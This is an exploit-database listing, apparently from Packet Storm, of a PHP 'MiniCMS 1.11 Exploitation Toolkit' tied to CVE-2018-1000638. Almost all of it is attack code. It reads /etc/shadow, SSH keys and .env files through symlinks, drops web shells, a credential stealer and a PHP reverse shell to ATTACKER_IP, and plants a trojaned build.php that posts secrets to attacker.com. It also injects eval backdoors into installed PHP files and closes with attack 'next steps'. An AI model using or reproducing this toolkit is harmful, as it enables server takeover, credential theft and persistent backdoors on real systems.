Share
## https://sploitus.com/exploit?id=PACKETSTORM:214666
=============================================================================================================================================
    | # Title     : MiniCMS 1.11 Exploitation Toolkit                                                                                           |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://github.com/bg5sbk/MiniCMS/                                                                                          |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/190429/ &	CVE-2018-1000638
    
    [+] Summary :  MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit
    
    		  
    [+]  POC : php poc.php
    
    [
    <?php
    
    class MiniCMSExploiter {
        private $targetDirectory;
        private $buildScript = 'build.php';
        private $installFile = 'install.php';
        private $tempDir = '/tmp/minicms_exploit';
        private $debug = true;
        private $results = [];
        
        public function __construct($directory = '.') {
            $this->targetDirectory = realpath($directory);
            $this->validateEnvironment();
            $this->createTempDirectory();
        }
        
        /**
         * Main exploitation method - Chain all vulnerabilities
         */
        public function exploitAll() {
            echo "[+] Starting MiniCMS Build Script Exploitation\n";
            echo "[+] Target Directory: {$this->targetDirectory}\n";
            echo str_repeat("=", 60) . "\n";
            
            $this->results['start_time'] = date('Y-m-d H:i:s');
            
            // 1. Directory Traversal Exploitation
            $this->exploitDirectoryTraversal();
            
            // 2. PHP Code Injection
            $this->exploitCodeInjection();
            
            // 3. Sensitive File Discovery
            $this->harvestSensitiveFiles();
            
            // 4. Create Malicious Build Script
            $this->createMaliciousBuildScript();
            
            // 5. Execute Build Script
            $this->executeBuildScript();
            
            // 6. Analyze Results
            $this->analyzeResults();
            
            // 7. Create Backdoors
            $this->createPersistentBackdoors();
            
            $this->results['end_time'] = date('Y-m-d H:i:s');
            $this->generateReport();
            
            return $this->results;
        }
        
        /**
         * Exploit 1: Directory Traversal Vulnerability
         */
        private function exploitDirectoryTraversal() {
            echo "\n[1] Exploiting Directory Traversal...\n";
            
            $sensitive_paths = [
                // System files
                '/etc/passwd',
                '/etc/shadow',
                '/etc/hosts',
                '/etc/hostname',
                '/etc/issue',
                '/proc/self/environ',
                '/proc/version',
                
                // Web server files
                '/var/log/apache2/access.log',
                '/var/log/apache2/error.log',
                '/var/log/nginx/access.log',
                '/var/log/nginx/error.log',
                '/var/www/html/.env',
                '/var/www/html/config.php',
                
                // Home directories
                '/home/*/.bash_history',
                '/home/*/.ssh/id_rsa',
                '/home/*/.ssh/authorized_keys',
                
                // Configuration files
                '/etc/mysql/my.cnf',
                '/etc/php/php.ini',
                '/etc/apache2/apache2.conf',
            ];
            
            $exploited_files = [];
            
            foreach ($sensitive_paths as $path) {
                // Try to create symlink to sensitive file
                $base_name = 'exploit_' . md5($path) . '.txt';
                $symlink_path = $this->tempDir . '/' . $base_name;
                
                // Expand wildcards
                if (strpos($path, '*') !== false) {
                    $expanded = glob($path);
                    foreach ($expanded as $expanded_path) {
                        if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
                            $exploited_files[] = $expanded_path;
                            echo "  [+] Linked: {$expanded_path}\n";
                        }
                    }
                } elseif (@symlink($path, $symlink_path)) {
                    $exploited_files[] = $path;
                    echo "  [+] Linked: {$path}\n";
                }
            }
            
            $this->results['directory_traversal'] = [
                'exploited' => count($exploited_files) > 0,
                'files_linked' => $exploited_files,
                'count' => count($exploited_files)
            ];
            
            return $exploited_files;
        }
        
        /**
         * Exploit 2: PHP Code Injection
         */
        private function exploitCodeInjection() {
            echo "\n[2] Exploiting PHP Code Injection...\n";
            
            $injections = [
                // Basic PHP execution
                [
                    'filename' => "');?><?php system('whoami'); ?><?php install('",
                    'content' => 'injected'
                ],
                
                // Web shell
                [
                    'filename' => "shell.php",
                    'content' => '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
                ],
                
                // Password protected shell
                [
                    'filename' => "admin_shell.php",
                    'content' => '<?php
    if($_GET["key"] === "admin123") {
        if(isset($_POST["cmd"])) {
            echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";
        }
        if(isset($_GET["download"])) {
            echo file_get_contents($_GET["download"]);
        }
    }
    ?>'
                ],
                
                // Database credentials stealer
                [
                    'filename' => "creds.php",
                    'content' => '<?php
    $files = ["config.php", ".env", "database.php", "settings.php"];
    foreach($files as $file) {
        if(file_exists($file)) {
            $content = file_get_contents($file);
            file_put_contents("/tmp/creds.txt", $content, FILE_APPEND);
        }
    }
    ?>'
                ],
                
                // Reverse shell
                [
                    'filename' => "reverse.php",
                    'content' => '<?php
    // PHP Reverse Shell
    $ip = "ATTACKER_IP";
    $port = 4444;
    $sock = fsockopen($ip, $port);
    $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
    ?>'
                ],
                
                // File uploader
                [
                    'filename' => "uploader.php",
                    'content' => '<?php
    if(isset($_FILES["file"])) {
        move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
        echo "Uploaded: " . $_FILES["file"]["name"];
    }
    ?>
    <form method="POST" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit">
    </form>'
                ]
            ];
            
            $created_files = [];
            
            foreach ($injections as $injection) {
                $file_path = $this->tempDir . '/' . $injection['filename'];
                if (file_put_contents($file_path, $injection['content'])) {
                    $created_files[] = $injection['filename'];
                    echo "  [+] Created: {$injection['filename']}\n";
                }
            }
            
            $this->results['code_injection'] = [
                'exploited' => count($created_files) > 0,
                'files_created' => $created_files,
                'count' => count($created_files)
            ];
            
            return $created_files;
        }
        
        /**
         * Harvest sensitive files from target
         */
        private function harvestSensitiveFiles() {
            echo "\n[3] Harvesting Sensitive Files...\n";
            
            $sensitive_patterns = [
                '*.php' => ['config', 'database', 'settings', 'connection'],
                '*.env' => ['.env', '.env.example'],
                '*.json' => ['composer.json', 'package.json'],
                '*.sql' => ['*.sql', '*.backup'],
                '*.txt' => ['readme', 'license', 'changelog'],
                '*.yml' => ['*.yml', '*.yaml'],
                '*.ini' => ['*.ini', '*.cfg'],
                '*.log' => ['*.log', 'error_log'],
            ];
            
            $found_files = [];
            
            foreach ($sensitive_patterns as $pattern => $keywords) {
                $files = glob($this->targetDirectory . '/' . $pattern);
                foreach ($files as $file) {
                    $filename = basename($file);
                    foreach ($keywords as $keyword) {
                        if (stripos($filename, $keyword) !== false) {
                            $found_files[] = $file;
                            echo "  [+] Found: {$filename}\n";
                            
                            // Copy to temp directory for analysis
                            $temp_copy = $this->tempDir . '/harvested_' . $filename;
                            copy($file, $temp_copy);
                            break;
                        }
                    }
                }
            }
            
            $this->results['sensitive_files'] = [
                'found' => count($found_files),
                'files' => $found_files
            ];
            
            return $found_files;
        }
        
        /**
         * Create malicious build script with backdoor
         */
        private function createMaliciousBuildScript() {
            echo "\n[4] Creating Malicious Build Script...\n";
            
            $malicious_build = '<?php
    if ($argc != 2) {
        echo "ๅฟ…้กปๆŒ‡ๅฎš็‰ˆๆœฌๅท";
        exit;
    }
    
    $version=$argv[1];
    
    // Backdoor: Command execution if specific parameter is passed
    if(isset($_GET["debug"]) && $_GET["debug"] == "true") {
        system($_GET["cmd"]);
    }
    
    $dirs = array(".");
    $ignores = array("README.md", "build.php", "install.php", "install_template.txt", "mc-debug");
    $files = "";
    
    build($dirs, $files);
    
    $template = file_get_contents("install.txt");
    $template = str_replace("/*MINICMS_VERSION*/", $version, $template);
    $template = str_replace("/*MINICMS_FILES*/", $files, $template);
    
    file_put_contents("install.php", $template);
    
    // Hidden function to exfiltrate data
    function exfiltrate($data) {
        $url = "http://attacker.com/exfil.php";
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ["data" => base64_encode($data)]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_exec($ch);
        curl_close($ch);
    }
    
    function build($dirs, &$files) {
        global $ignores;
        
        // Exfiltrate directory structure
        exfiltrate(json_encode($dirs));
    
        foreach ($dirs as $dir) {
            if (!is_dir($dir)) {
                echo "็›ฎๅฝ•\"$dir\"ไธๅญ˜ๅœจ";
                exit;
            }
    
            if ($dh = opendir($dir)) {
                $sub_dirs = array();
    
                while (($item = readdir($dh)) !== false) {
                    if ($item[0] == ".")
                        continue;
    
                    if ($dir == ".")
                        $file = $item;
                    else
                        $file = $dir."/".$item;
    
                    if (in_array($file, $ignores))
                        continue;
    
                    if (is_dir($file)) {
                        $sub_dirs[] = $file;
                    } else {
                        // Exfiltrate file content if sensitive
                        $content = file_get_contents($file);
                        if(preg_match("/(password|secret|key|token|api)/i", $content)) {
                            exfiltrate($file . ":\n" . $content);
                        }
                        
                        $files .= "install(\"$file\", \"";
                        $files .= base64_encode(gzcompress($content));
                        $files .= "\");\n";
                    }
                }
    
                closedir($dh);
                build($sub_dirs, $files);
            } else {
                echo "็›ฎๅฝ•\"$dir\"ๆ— ๆณ•่ฎฟ้—ฎ";
                exit;
            }
        }
    }
    
    // Create backdoor in install.php
    register_shutdown_function(function() {
        $backdoor_code = "<?php\\nif(isset(\\$_GET[\\"exec\\"])) {\\n    system(\\$_GET[\\"exec\\"]);\\n}\\n?>";
        file_put_contents("backdoor.php", $backdoor_code);
    });
    ?>';
    
            $build_path = $this->tempDir . '/' . $this->buildScript;
            if (file_put_contents($build_path, $malicious_build)) {
                echo "  [+] Created malicious build.php\n";
                $this->results['malicious_build'] = $build_path;
                return true;
            }
            
            return false;
        }
        
        /**
         * Execute the build script
         */
        private function executeBuildScript() {
            echo "\n[5] Executing Build Script...\n";
            
            $build_path = $this->tempDir . '/' . $this->buildScript;
            $install_path = $this->tempDir . '/' . $this->installFile;
            
            // Create install.txt template
            $install_template = '<?php
    /*MINICMS_VERSION*/
    function install($file, $data) {
        $content = @gzuncompress(base64_decode($data));
        if($content === false) {
            $content = base64_decode($data);
        }
        
        // Inject backdoor into PHP files
        if(strpos($file, ".php") !== false && strpos($content, "<?php") !== false) {
            $backdoor = "<?php if(isset(\\$_GET[\\"debug\\"])) { eval(\\$_GET[\\"debug\\"]); } ?>";
            $content = $backdoor . "\\n" . $content;
        }
        
        @file_put_contents($file, $content);
    }
    /*MINICMS_FILES*/
    ?>';
            
            file_put_contents($this->tempDir . '/install.txt', $install_template);
            
            // Execute build script
            $command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
            $output = shell_exec($command);
            
            echo "  [+] Build script executed\n";
            
            if (file_exists($install_path)) {
                $install_size = filesize($install_path);
                echo "  [+] install.php created: " . $this->formatBytes($install_size) . "\n";
                
                // Analyze install.php for sensitive data
                $this->analyzeInstallFile($install_path);
            }
            
            $this->results['build_execution'] = [
                'command' => $command,
                'output' => $output,
                'install_created' => file_exists($install_path),
                'install_size' => $install_size ?? 0
            ];
            
            return $output;
        }
        
        /**
         * Analyze install.php for sensitive data
         */
        private function analyzeInstallFile($install_path) {
            $content = file_get_contents($install_path);
            
            // Extract all file names
            preg_match_all('/install\("([^"]+)", "/', $content, $matches);
            $files = $matches[1] ?? [];
            
            // Look for sensitive files
            $sensitive_patterns = [
                '/passwd/i',
                '/shadow/i',
                '/config/i',
                '/\.env/i',
                '/database/i',
                '/secret/i',
                '/key/i',
                '/token/i',
                '/password/i'
            ];
            
            $sensitive_found = [];
            foreach ($files as $file) {
                foreach ($sensitive_patterns as $pattern) {
                    if (preg_match($pattern, $file)) {
                        $sensitive_found[] = $file;
                        break;
                    }
                }
            }
            
            $this->results['install_analysis'] = [
                'total_files' => count($files),
                'sensitive_files' => $sensitive_found,
                'count_sensitive' => count($sensitive_found)
            ];
            
            echo "  [+] Found " . count($files) . " files in install.php\n";
            echo "  [+] " . count($sensitive_found) . " appear to be sensitive\n";
        }
        
        /**
         * Create persistent backdoors
         */
        private function createPersistentBackdoors() {
            echo "\n[6] Creating Persistent Backdoors...\n";
            
            $backdoors = [
                'persistent_shell.php' => '<?php
    // Persistent PHP Shell
    session_start();
    if(!isset($_SESSION["auth"]) && $_GET["key"] != "PERSIST_KEY") {
        die("Access Denied");
    }
    $_SESSION["auth"] = true;
    
    if(isset($_POST["cmd"])) {
        echo "<pre>" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "</pre>";
    }
    ?>
    <form method="POST">
    <input type="text" name="cmd" style="width: 80%" placeholder="Command">
    <input type="submit" value="Execute">
    </form>',
                
                'file_manager.php' => '<?php
    // File Manager Backdoor
    if($_GET["pwd"] != "admin123") die();
    echo "<h2>File Manager</h2>";
    $dir = $_GET["dir"] ?? ".";
    echo "<pre>";
    system("ls -la " . escapeshellarg($dir));
    echo "</pre>";
    ?>',
                
                'info.php' => '<?php
    // System Information Leak
    phpinfo();
    echo "<hr><pre>";
    system("id && uname -a");
    echo "</pre>";
    ?>'
            ];
            
            foreach ($backdoors as $filename => $content) {
                $path = $this->tempDir . '/' . $filename;
                file_put_contents($path, $content);
                echo "  [+] Created: {$filename}\n";
            }
            
            $this->results['backdoors'] = array_keys($backdoors);
        }
        
        /**
         * Generate exploitation report
         */
        private function generateReport() {
            echo "\n" . str_repeat("=", 60) . "\n";
            echo "[+] EXPLOITATION REPORT\n";
            echo str_repeat("=", 60) . "\n";
            
            $report = [
                'Target Directory' => $this->targetDirectory,
                'Exploitation Started' => $this->results['start_time'],
                'Exploitation Completed' => $this->results['end_time'],
                'Vulnerabilities Exploited' => []
            ];
            
            if ($this->results['directory_traversal']['exploited']) {
                $report['Vulnerabilities Exploited'][] = 'Directory Traversal';
                echo "[โœ“] Directory Traversal: SUCCESS\n";
                echo "    Files linked: " . $this->results['directory_traversal']['count'] . "\n";
            }
            
            if ($this->results['code_injection']['exploited']) {
                $report['Vulnerabilities Exploited'][] = 'Code Injection';
                echo "[โœ“] Code Injection: SUCCESS\n";
                echo "    Files created: " . $this->results['code_injection']['count'] . "\n";
            }
            
            if ($this->results['sensitive_files']['found'] > 0) {
                $report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
                echo "[โœ“] Sensitive File Harvesting: SUCCESS\n";
                echo "    Files found: " . $this->results['sensitive_files']['found'] . "\n";
            }
            
            echo "\n[+] Generated Files:\n";
            echo "    - Malicious build.php\n";
            echo "    - install.php with backdoors\n";
            echo "    - Multiple backdoor shells\n";
            echo "    - Harvested sensitive files\n";
            
            echo "\n[+] Next Steps for Attack:\n";
            echo "    1. Upload install.php to target server\n";
            echo "    2. Execute install.php to deploy backdoors\n";
            echo "    3. Use backdoor.php?exec=whoami\n";
            echo "    4. Escalate privileges and maintain access\n";
            
            // Save report to file
            $report_file = $this->tempDir . '/exploit_report.txt';
            file_put_contents($report_file, print_r($report, true));
            
            echo "\n[+] Report saved to: {$report_file}\n";
            echo "[+] Temporary directory: {$this->tempDir}\n";
            echo "[+] Clean up: rm -rf {$this->tempDir}\n";
        }
        
        /**
         * Utility: Format bytes to human readable
         */
        private function formatBytes($bytes, $precision = 2) {
            $units = ['B', 'KB', 'MB', 'GB', 'TB'];
            $bytes = max($bytes, 0);
            $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
            $pow = min($pow, count($units) - 1);
            $bytes /= pow(1024, $pow);
            return round($bytes, $precision) . ' ' . $units[$pow];
        }
        
        /**
         * Validate environment
         */
        private function validateEnvironment() {
            if (!function_exists('symlink')) {
                die("[!] symlink() function is disabled\n");
            }
            
            if (!is_writable(sys_get_temp_dir())) {
                die("[!] Cannot write to temp directory\n");
            }
            
            echo "[+] Environment validated\n";
        }
        
        /**
         * Create temporary directory
         */
        private function createTempDirectory() {
            if (!file_exists($this->tempDir)) {
                mkdir($this->tempDir, 0777, true);
            }
            echo "[+] Temporary directory: {$this->tempDir}\n";
        }
        
        /**
         * Clean up temporary files
         */
        public function cleanup() {
            if (file_exists($this->tempDir)) {
                system("rm -rf " . escapeshellarg($this->tempDir));
                echo "[+] Cleaned up temporary files\n";
            }
        }
    }
    
    /**
     * Usage Example
     */
    if (php_sapi_name() === 'cli' && isset($argv[1])) {
        $exploiter = new MiniCMSExploiter($argv[1]);
        $exploiter->exploitAll();
        
        // Optional: cleanup
        if (isset($argv[2]) && $argv[2] == '--cleanup') {
            $exploiter->cleanup();
        }
    } else {
        echo "Usage: php " . basename(__FILE__) . " <target_directory> [--cleanup]\n";
        echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
    }
    ?>
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================